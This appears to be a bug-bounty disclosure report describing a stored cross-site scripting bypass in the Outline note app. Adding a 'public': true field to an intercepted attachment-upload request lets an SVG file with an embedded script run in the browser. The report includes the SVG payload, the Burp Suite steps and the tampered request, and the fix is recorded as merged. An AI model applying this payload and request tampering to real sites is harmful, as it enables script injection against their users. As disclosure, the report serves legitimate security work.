[Bypass] Cross-site Scriptin (XSS) via file upload in outline/outline

Valid

Reported on

Jul 17th 2022


🔒️ Requirements

Privileges: User.

📝 Description

I found a bypass to this report by uploading the file with "public": true, parameter. This is due to the fact that AWS bucket public folder does not auto download files when we access them.

🕵️‍♂️ Proof of Concept

Step 1: Go your outline home and create a new note.

new-note.png

Step 2: Start burp suite with proxy -> Intercept is on.

burp01.png

Step 3: Add in the note, the following .svg file by taping /file and [ENTER].

<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Step 4: On burp suite, press Forward until you see:

POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
...
Connection: close

{
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca","contentType": "image/svg+xml",
    "size":129,
    "name":"xss.svg"
}

Step 5: Add "public": true, inside the JSON.

{
    "public": true,
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"
}

Step 6: Forward and turn Intercept to off.

burp02.png

Step 7: Go to your note and click to the file.

  • File

file.png

  • XSS

xss.png

🔨 Fix

To fix this vulnerability, I suggest you to force download on the public part of the AWS bucket too.

Impact

An attacker could use it to get sensitive information stored in the AWS bucket.

We are processing your report and will contact the outline team within 24 hours. 17 days ago
We have contacted a member of the outline team and are waiting to hear back 16 days ago
Tom Moor validated this vulnerability 16 days ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor confirmed that a fix has been merged on 9dd28d 16 days ago
The fix bounty has been dropped
brecheyashtiff
14 days ago

Administrative Help

to join this conversation